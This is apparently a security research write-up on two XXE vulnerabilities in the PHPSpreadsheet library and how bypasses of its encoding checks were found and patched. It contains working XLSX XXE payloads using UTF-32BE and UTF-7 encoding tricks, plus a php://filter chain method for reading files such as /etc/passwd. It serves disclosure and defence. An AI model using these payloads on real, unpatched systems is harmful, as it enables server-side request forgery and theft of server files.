Indice
ToggleIntroduction
During a penetration test, you often encounter web applications that are either built using third-party products or developed from scratch—and in both cases, external libraries invariably come into play. This practice typically enhances both code quality and security, while also giving penetration testers the chance to delve deep into the component’s source code to uncover new vulnerabilities and potentially gain access to the application.
This is exactly what happened to Antonio Rocco Spataro and Antonio Russo during a penetration test for Unlock Security on an application that utilizes the PHPSpreadsheet library. PHPSpreadsheet is the premier open-source PHP library for reading and writing spreadsheets in various formats, such as Excel and LibreOffice Calc, and it now boasts over 218 million installations along with more than 1,200 projects that rely on it as a dependency.
In this article, we’ll walk you through, step by step, how we managed to uncover two 0day vulnerabilities that enabled an XXE attack, circumventing both the library’s built-in protections and the subsequent patches deployed by its developers.
Setting up the test environment
As is often the case, to both protect the client's application and streamline our analysis, a dedicated test environment is set up for the testing process.
To allow anyone interested in exploring this vulnerability, we've made a ready-to-use test environment available by leveraging devcontainers with VS Code. The project structure is as follows:
.
├── composer.json
├── .devcontainer
│ ├── devcontainer.json
│ └── Dockerfile
├── index.php
├── payload.xlsx
└── .vscode
└── launch.json
The composer.json
file specifies the library name and version to be included in the project; in this case, only PHPSpreadsheet, and it must be a vulnerable version prior to 3.4.0. We opted for version 3.3.0:
{
"require": {
"phpoffice/phpspreadsheet": "3.3.0"
}
}
The .devcontainer/Dockerfile
sets up a testing environment with all the necessary dependencies required for the library to function correctly for our purposes:
FROM mcr.microsoft.com/devcontainers/php:8-bullseye
# Install system dependencies
RUN export DEBIAN_FRONTEND=noninteractive && \
apt-get update && \
apt-get -y install --no-install-recommends \
libpng-dev \
libxml2-dev \
libzip-dev
# Install PHP extensions
RUN docker-php-ext-install gd xml zip
Within the .devcontainer/devcontainer.json
file, instructions are provided for using the Dockerfile
, initializing the project, and installing all the essential VS Code extensions to ease PHP code analysis:
{
"name": "Pentesting PHPSpreadsheet",
"context": ".",
"dockerFile": "Dockerfile",
"customizations": {
"vscode": {
"extensions": [
"xdebug.php-debug"
]
}
},
"portsAttributes": {
"9000": {
"label": "PHP XDebug",
"onAutoForward": "ignore"
}
},
"postCreateCommand": "composer install"
}
Next, we create a simple PHP snippet that uses PHPSpreadsheet to open our XLSX payload and print the contents of the active spreadsheet's cells:
<?php
require 'vendor/autoload.php';
use \PhpOffice\PhpSpreadsheet\Spreadsheet;
use \PhpOffice\PhpSpreadsheet\IOFactory;
$spreadsheet = new Spreadsheet();
$inputFileType = 'Xlsx';
$inputFileName = 'payload.xlsx';
$reader = IOFactory::createReader($inputFileType);
$spreadsheet = $reader->load($inputFileName);
$worksheet = $spreadsheet->getActiveSheet();
print_r($worksheet->toArray());
Once the Dev Containers extension is installed in VS Code, we're all set to launch our test environment and begin vulnerability analysis, though not before briefly explaining how the XLSX format works.
The XLSX format
XLSX files have become a widely adopted standard for managing spreadsheets. In essence, an XLSX file is a ZIP archive that contains several XML files structured according to the Office Open XML (OOXML) specifications.
To gain a clearer understanding of the structure and the key files that will be involved in exploiting the vulnerability, let's create a sample XLSX file:
Once the file is saved, you can use the unzip
utility to inspect the internal file structure:
$ unzip -l sample-file.xlsx
Archive: sample-file.xlsx
Length Date Time Name
--------- ---------- ----- ----
681 2025-03-02 12:32 xl/_rels/workbook.xml.rels
878 2025-03-02 12:32 xl/workbook.xml
2257 2025-03-02 12:32 xl/theme/theme1.xml
4451 2025-03-02 12:32 xl/styles.xml
2247 2025-03-02 12:32 xl/worksheets/sheet1.xml
212 2025-03-02 12:32 xl/sharedStrings.xml
571 2025-03-02 12:32 _rels/.rels
731 2025-03-02 12:32 docProps/core.xml
412 2025-03-02 12:32 docProps/app.xml
1480 2025-03-02 12:32 [Content_Types].xml
--------- -------
13920 10 files
Inside this archive, you’ll find documents such as workbook.xml
, which defines the overall structure of the file and contains references to the individual spreadsheets:
<!-- xl/workbook.xml -->
...
<sheets>
<sheet name="FirstSheet" sheetId="1" state="visible" r:id="rId2"/>
</sheets>
...
The sharedStrings.xml
file plays a crucial role in managing text strings used in cells. Instead of storing the text directly in each cell, all unique strings are saved in this file so they can be reused multiple times, thus reducing redundancy and optimizing space.
In the sharedStrings.xml
file, the root element is <sst>
(shared string table), which encompasses all <si>
(shared string item) elements. Each <si>
contains the text, usually enclosed in a <t>
(text) element, or a more complex structure called <r>
(RichTextRun) to handle formatted text:
<!-- xl/sharedStrings.xml -->
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">this is a string</t>
</si>
</sst>
The sheet1.xml
file contains the actual data for the cells in the first sheet. Cells containing text use the attribute t="s"
to indicate that their content is a reference to the shared string table. Inside the cell, the <v>
element holds a numeric index that points to the corresponding string in sharedStrings.xml
.
<!-- xl/worksheets/sheet1.xml -->
...
<sheetData>
<row r="1" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
<c r="A1" s="0" t="s">
<v>0</v>
</c>
</row>
</sheetData>
...
Each XML file thus plays a specific role in defining the appearance, data, and formatting of the document.
PHPSpreadsheet and the XXE vulnerabilities
Given the extensive reliance on XML files, it might seem natural to use a basic XXE payload to either read system files or trigger HTTP requests. One approach is to unpack the XLSX file, modify one of its XML files by inserting the malicious payload, repackage it as an XLSX archive, and then open it with PHPSpreadsheet.
Let's attempt this by modifying the sharedStrings.xml
file as follows:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE sst [
<!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
%ext;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
In this scenario, we expect that an XXE-vulnerable parser would process the sharedStrings.xml
file and issue an HTTP request to the specified address to load an external DTD file. When we run our code snippet in the test environment, we get the following output:
Fatal error: Uncaught PhpOffice\PhpSpreadsheet\Reader\Exception: Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks in /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Security/XmlScanner.php:82
Stack trace:
#0 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Xlsx.php(123): PhpOffice\PhpSpreadsheet\Reader\Security\XmlScanner->scan('<?xml version="...')
#1 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Xlsx.php(700): PhpOffice\PhpSpreadsheet\Reader\Xlsx->loadZip('xl/sharedString...', 'http://schemas....')
#2 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/BaseReader.php(194): PhpOffice\PhpSpreadsheet\Reader\Xlsx->loadSpreadsheetFromFile('./assets/sample...')
#3 /workspaces/phpspreadsheet/index.php(13): PhpOffice\PhpSpreadsheet\Reader\BaseReader->load('./assets/sample...')
#4 {main}
thrown in /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Security/XmlScanner.php on line 82
PHPSpreadsheet successfully identifies the XXE attempt and halts the process. The next question is: how exactly does it perform this validation?
Security checks in PHPSpreadsheet
As the stack trace indicated earlier, PHPSpreadsheet’s security mechanisms are implemented in the class PhpOffice\PhpSpreadsheet\Reader\Security\XmlScanner
, specifically within the scan($xml)
method, which is defined as follows:
public function scan($xml): string
{
$xml = "$xml";
$xml = $this->toUtf8($xml);
// Don't rely purely on libxml_disable_entity_loader()
$pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/';
if (preg_match($pattern, $xml)) {
throw new Reader\Exception('Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
}
// …
}
The check operates by scanning the XML for the string <!DOCTYPE
, which may be interleaved with null bytes (e.g., \0<\0!\0D\0O\0C\0T\0Y\0P\0E\0
) to account for encodings such as UTF-16
(commonly used in Windows).
Although both the method’s documentation and the exception message imply that the check targets <!ENTITY
occurrences, our tests have shown that it actually looks for <!DOCTYPE
. This is likely because an XXE attack can be executed using just a DOCTYPE declaration.
Before performing this scan, the XML is converted to UTF-8 by the toUtf8($xml)
method, whose implementation is as follows:
private function toUtf8(string $xml): string
{
$charset = $this->findCharSet($xml);
if ($charset !== 'UTF-8') {
$xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));
$charset = $this->findCharSet($xml);
if ($charset !== 'UTF-8') {
throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
}
}
return $xml;
}
To determine the character encoding used in the XML, the method findCharSet($xml)
is employed. This function searches for instances of the string encoding="<codifica>"
, accommodating any extra spaces and the use of either single or double quotes. If an encoding is found, it is returned (in uppercase); if not, it defaults to UTF-8
.
private function findCharSet(string $xml): string
{
$patterns = [
'/encoding\\s*=\\s*"([^"]*]?)"/',
"/encoding\\s*=\\s*'([^']*?)'/",
];
foreach ($patterns as $pattern) {
if (preg_match($pattern, $xml, $matches)) {
return strtoupper($matches[1]);
}
}
return 'UTF-8';
}
CVE-2024-47873
At first glance, PHPSpreadsheet's security measures may seem both simple and effective, but are they really foolproof? Under what conditions can an XXE payload slip past all the checks?
The answer lies in the XML specification, specifically in the "Autodetection of Character Encodings (Non-Normative)" section. This part of the standard explains that since every XML entity must start with an encoding declaration, and the very first characters are always <?xml
, a parser can determine the encoding by reading just 2 to 4 bytes. The encoding is inferred by matching these bytes against the following table:
00 00 00 3C
,3C 00 00 00
,00 00 3C 00
,00 3C 00 00
corresponds to UCS-4 or any other 32-bit encoding in which ASCII characters are encoded using their standard ASCII values.00 3C 00 3F
indicates UTF-16BE, ISO-10646-UCS-2 (big endian), or other 16-bit big endian encodings where ASCII characters remain intact.3C 00 3F 00
Matches UTF-16LE, ISO-10646-UCS-2 (little endian), or similar 16-bit little endian encodings where ASCII characters remain intact.3C 3F 78 6D
represents UTF-8, ISO 646, ASCII, partially ISO 8859, Shift-JIS, EUC, or other 7- or 8-bit encodings, as well as variable-length encodings where the ASCII characters retain their positions, lengths, and values.4C 6F A7 94
corresponds to the EBCDIC encoding
Because the scan($xml)
function only flags an XXE attempt if it finds either the literal string <!DOCTYPE
or its variant interleaved with null bytes \0<\0!\0D\0O\0C\0T\0Y\0P\0E\0
, we can exploit this by using a 32-bit encoding that inserts more than one null byte before each character. For example, the resulting string could look like this: \0\0\0<\0\0\0!\0\0\0D\0\0\0O\0\0\0C\0\0\0T\0\0\0Y\0\0\0P\0\0\0E\0\0\0
, that is three null bytes preceding every ASCII character. To achieve this, we can use either UTF-32BE
or UTF-32LE
encoding.
Some might object that our payload is converted to UTF-8 before the security checks run, thereby stripping out the null bytes and invalidating our approach.
However, a closer look at the implementations of the toUtf8($xml)
and findCharSet($xml)
methods reveals why this isn't the case:
private function toUtf8(string $xml): string
{
$charset = $this->findCharSet($xml);
if ($charset !== 'UTF-8') {
$xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));
$charset = $this->findCharSet($xml);
if ($charset !== 'UTF-8') {
throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
}
}
return $xml;
}
private function findCharSet(string $xml): string
{
$patterns = [
'/encoding\\s*=\\s*"([^"]*]?)"/',
"/encoding\\s*=\\s*'([^']*?)'/",
];
foreach ($patterns as $pattern) {
if (preg_match($pattern, $xml, $matches)) {
return strtoupper($matches[1]);
}
}
return 'UTF-8';
}
Notice that the conversion to UTF-8 only occurs when the declared encoding isn't UTF-8. However, the encoding is detected using regular expressions that fail to account for possible null bytes. If none of these expressions detect an encoding, the function defaults to returning "UTF-8". Consequently, if our payload's encoding declaration is in UTF-32BE, it goes unnoticed and no conversion takes place.
Even though our XML payload isn't converted, it still functions as intended because libxml2, the underlying library PHPSpreadsheet relies on for XML parsing, adheres to the standard. It correctly determines the encoding by reading the first 4 bytes of the payload.
With that in mind, we create our payload in UTF-32BE. For this purpose, we use CyberChef, an online tool that facilitates various encoding conversions.
We copy the payload into CyberChef's input window, select UTF-32BE
as the target encoding, and save the resulting file, overwriting the existing sharedStrings.xml
. Next, we repackage the files into a ZIP archive with an XLSX extension and run our proof-of-concept, ensuring that an HTTP server is listening on port 1337 (for instance, by running php -S 127.0.0.1:1337
):
The fix for correcting the issue
The first remedy proposed by the PHPSpreadsheet developers involved modifying the regular expression responsible for detecting the doctype. The updated expression now accounts for the presence of multiple null bytes rather than just one. In other words, the original pattern:
$pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/'
was replaced with this more robust version:
$pattern = '/\0*' . implode('\0*', mb_str_split($this->pattern, 1, 'UTF-8')) . '\0*/'
Bypassing the fix
Those paying close attention might recall that among the automatically detected encodings is EBCDIC-INT, which, unlike UTF-based encodings, does not use null bytes. This loophole effectively bypasses the security checks once again.
To address this issue, the developers restricted the use of the EBCDIC encoding by modifying the findCharSet($xml)
method as follows:
private function findCharSet(string $xml): string
{
if (substr($xml, 0, 4) === "\x4c\x6f\xa7\x94") {
throw new Reader\Exception('EBCDIC encoding not permitted');
// …
}
CVE-2024-48917
Following the release of a new PHPSpreadsheet version that patched the previous vulnerability, researchers Antonio Rocco Spataro and Antonio Russo continued analyzing the library. They discovered yet another potential vector for achieving an XXE attack.
Let's revisit the findCharSet($xml)
method:
private function findCharSet(string $xml): string
{
$patterns = [
'/encoding\\s*=\\s*"([^"]*]?)"/',
"/encoding\\s*=\\s*'([^']*?)'/",
];
foreach ($patterns as $pattern) {
if (preg_match($pattern, $xml, $matches)) {
return strtoupper($matches[1]);
}
}
return 'UTF-8';
}
This function iterates over two regular expressions, checking for an encoding="<codifica>"
(double quotes) or encoding='<codifica>'
(single quotes) declaration within the XML file. The first match found determines the encoding used.
However, if both patterns match different parts of the XML file, the function will always return the value specified inside double quotes, as it's processed first.
For example, if we craft an XML header like <?xml version="1" encoding='A' encoding="B">
, the detected encoding would be "B". The same applies to the following case:
<?xml version="1" encoding='A'>
<root>
<aTag attribute="value">text</aTag>
<!--encoding="B"-->
</root>
Why is this useful? In the previous CVE, we established that scan($xml)
fails to detect a <!DOCTYPE>
declaration when the XML file uses an encoding other than UTF-8 or UTF-16. However, the libxml2 library, which PHPSpreadsheet relies on, can still recognize and correctly process the encoding.
This creates a new XXE vulnerability if we can manipulate the encoding to be recognized as UTF-8 by PHPSpreadsheet (thus bypassing its security checks) while still being parsed correctly by libxml2.
We already know that every XML parser must support at least a handful of standard encodings, including 7-bit encodings like UTF-7. A file encoded in UTF-7 is typically identified by the sequence 3C 3F 78 6D
(the <?xml
string). However, because multiple encodings start with this sequence, we must explicitly specify encoding='UTF-7'
to ensure libxml2 interprets the file correctly.
The key advantage of UTF-7 is that it encodes data using ASCII characters, which allows us to mix valid UTF-8 content with segments encoded in UTF-7. This means we can selectively encode specific characters, such as <
as +ADw-!DOCTYPE
making it unrecognizable to PHPSpreadsheet's security checks.
You can easily convert text to UTF-7 using CyberChef or similar tools.
The resulting payload would look like this:
<?xml version = "1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
<!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
%ext;
]>
<si>
<t xml:space="preserve">this is a string</t>
</si>
However, there's a catch: PHPSpreadsheet will detect the encoding='UTF-7'
declaration and convert the XML file to UTF-8, making the malicious payload visible again. We can achieve this by appending a misleading encoding declaration inside an XML comment like <!--encoding="UTF-8"-->
.
In XML, attributes must be unique, within the same tag. This means we cannot define <?xml version="1.0" encoding='UTF-7' encoding="UTF-8"?>
. Similarly, using an invalid attribute like <?xml version="1.0" encoding='UTF-7' exampleencoding="UTF-8"?>
in the prolog will cause a parsing error:
$ xmllint file.xml
file.xml:1: parser error : parsing XML declaration: '?>' expected
<?xml version="1.0" exampleencoding='UTF-8'?>
Here's the final payload:
<?xml version = "1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
<!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
%ext;
]>
<si>
<t xml:space="preserve">this is a string</t>
</si>
<!--encoding="UTF-8"-->
Now, we insert this payload into an XLSX file, execute it, and check the result:
As expected, PHPSpreadsheet fails to detect the attack, and shortly after, we observe an HTTP request to http://127.0.0.1:1337/we_got_xxe
.
From blind SSRF to arbitrary file read
So far, we've demonstrated how to achieve blind SSRF through an XXE vulnerability. At first glance, it might seem like we could simply modify our XXE payload to read and exfiltrate data, using something like this:
<!DOCTYPE sst [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
However, by default, libxml does not enable the LIBXML_NOENT option, which is required for replacing entities within an XML file. This restriction applies only to external entities, meaning internal entity substitution still works as expected. For example, with the following payload, the first cell in the XLSX file would contain the string "a sample string":
<!DOCTYPE sst [
<!ENTITY xxe "a sample string">
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
Now, the key question is: can we exploit this behavior to read a file's contents? Let's start with the following payload:
<!DOCTYPE sst [
<!ENTITY % hostname SYSTEM "file:///etc/hostname">
%hostname;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
This works by injecting the contents of /etc/hostname
into the variable hostname
, which is then inserted into the XML file wherever %hostname;
; appears. However, since we still need an xxe
entity to perform the actual substitution, this alone won't work.
Now, consider a scenario where the hostname itself was something like <!ENTITY xxe "a very unusual hostname">
. This would effectively define a new xxe
entity, making it available for substitution inside sharedStrings.xml
.
If we could somehow force the inclusion of a prefix and a suffix, we could control the structure of the injected entity and use it to leak arbitrary files.
The solution lies in WrapWrap, a tool developed by Ambionics. WrapWrap chains php://filter
gadgets to add arbitrary prefixes and suffixes to file contents, effectively transforming raw file data into a usable XML entity.
WrapWrap uses a series of encoding conversions to manipulate character representation, allowing us to prepend and append custom data. Here's an example of how different character encodings can be leveraged:
conversions = {
b"0": "convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2",
b"1": "convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4",
b"2": "convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921",
b"3": "convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE",
b"4": "convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE",
b"5": "convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2",
b"6": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2",
b"7": "convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4",
b"8": "convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2",
b"9": "convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB",
b"A": "convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213",
b"a": "convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE",
b"B": "convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000",
b"b": "convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE",
b"C": "convert.iconv.UTF8.CSISO2022KR",
b"c": "convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2",
b"D": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213",
b"d": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5",
# …
}
WrapWrap takes three key inputs: the file path (to the target file), a prefix and suffix (which help shape the payload) and the number of bytes to extract.
python wrapwrap.py --help
usage: wrapwrap.py [-h] [-o OUTPUT] [-p PADDING_CHARACTER] [-f] path prefix suffix nb_bytes
Generates a php://filter wrapper that adds a prefix and a suffix to the contents of a file.
Example:
$ ./wrapwrap.py /etc/passwd '<root><test>' '</test></root>' 100
[*] Dumping 108 bytes from /etc/passwd.
[+] Wrote filter chain to chain.txt (size=88781).
$ php -r 'echo file_get_contents(file_get_contents("chain.txt"));'
<root><test>root:x:0:0:root:/root:/bin/bash=0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin=0Abin:x:2:2:bin:/bin:/usr/</test></root>
positional arguments:
path Path to the file
prefix A string to write before the contents of the file
suffix A string to write after the contents of the file
nb_bytes Number of bytes to dump. It will be aligned with 9
options:
-h, --help show this help message and exit
-o, --output OUTPUT File to write the payload to. Defaults to chain.txt
-p, --padding-character PADDING_CHARACTER
Character to pad the prefix and suffix. Defaults to `M`.
-f, --from-file If set, prefix and suffix indicate files to load their value from, instead of the value itself
We can generate a wrapped payload for /etc/hostname like this:
python wrapwrap.py /etc/hostname "<\!ENTITY xxe '" "'>" 54
[*] Dumping 54 bytes from /etc/hostname.
[+] Wrote filter chain to chain.txt (size=49312).
The size of the generated chain is close to 50,000 bytes, which is the maximum length allowed for an entity name in libxml2 (XML_MAX_NAME_LENGTH).
The output of this command is a php://filter chain that looks something like this:
php://filter/convert.base64-encode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.quoted-printable-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|
…
convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode|dechunk|convert.base64-decode|convert.base64-decode/resource=/etc/hostname
Since XML does not allow PHP filter chains separated by |
, we must replace all occurences of |
with /
This gives us the final payload to red the /etc/hostname
file:
<?xml version="1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
<!ENTITY % hostname SYSTEM "PHP_FILTER_URL_GENERATED_BY_WRAPWRAP" >
%hostname;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
<!--encoding="UTF-8"-->
To leak other files, such as /etc/passwd
, simply replace the target file path at the very end of the php://filter chain:
Conclusions
The PHPSpreadsheet team responded swiftly to the vulnerability reports submitted by Antonio Rocco Spataro and Antonio Russo, actively involving them in the remediation process. Starting from version 3.4.0, the library addresses the reported security flaws by completely reworking the affected methods, ensuring a more robust and secure implementation.